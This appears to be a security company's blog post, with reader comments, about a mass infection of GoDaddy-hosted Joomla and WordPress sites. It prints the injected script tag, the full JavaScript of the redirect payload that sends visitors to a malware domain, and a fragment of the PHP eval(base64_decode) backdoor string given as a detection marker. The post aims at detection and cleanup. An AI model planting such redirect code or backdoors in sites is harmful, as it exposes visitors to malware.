It seems that a second round of attacks are happening today at GoDaddy and infecting all kind of sites (Joomla, Wordress,etc). Looking at the modification dates on the files, they all happened May 1st (today) during the morning from 1 to 3/4 am.
All of them had the following javascript added to their pages:
script src= http://kdjkfjskdfjlskdjf.com/kp.php
Which looks very similar to the attacks from the last few weeks, but this time using kp.php instead of js.php. Also, many sites that were not infected during the previous batch got hacked now.
This is how this kb.php file looks like:
function setCookie(c_name,value,expiredays)
{
var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays);
document.cookie=c_name+ “=” +escape(value)+ ((expiredays==null) ? “” :
“;expires=”+exdate.toGMTString()); } function getCookie(c_name){
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + “=”);
if (c_start!=-1) { c_start=c_start + c_name.length+1;
c_end=document.cookie.indexOf(“;”,c_start);
if (c_end==-1) c_end=document.cookie.length; return
unescape(document.cookie.substring(c_start,c_end)); } } return “”; } var
name=getCookie(“pma_visited_theme1″); if (name==”"){ setCookie(“pma_visited_theme1″,”1″,20);
var
url=”http://www3.workfree36-td.xorg.pl/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG3KXsWYlGhnZWuVmA%3D%3D”; window.top.location.replace(url);
}else{ }
As you can see, very similar to the previous attack, also loading malware from this *.xorg.pl domain…
If your site got hacked, open your index files and look for this string on the top of it:
< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYha
XNzZXQoJEdMT0JBTFNbJ2..
Removing that from all your index files should solve the problem.
If you are using WordPress, all the *.php files inside your themes folder got modified. So, you have to clean them too.
UPDATE 1 – People are starting to complain on the WordPress forums: http://wordpress.org/support/topic/394255.
UPDATE 2tweeted about it saying that it is related only to WordPress. It is affecting all platforms there.
As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.
I'm on Bluehost, and have two tikiwiki sites and two drupal sites that have this same hack. The fix from Sucuri here has not helped at all. Anybody have any idea what I can do to get my sites back online?
Singha:
Can you send me your site name? I will take a look for you.
I've removed wordpress completely and it's still hacking my site once a month or so. Ahhhhhhhh
Pingback: Selfhosting or not: Hackers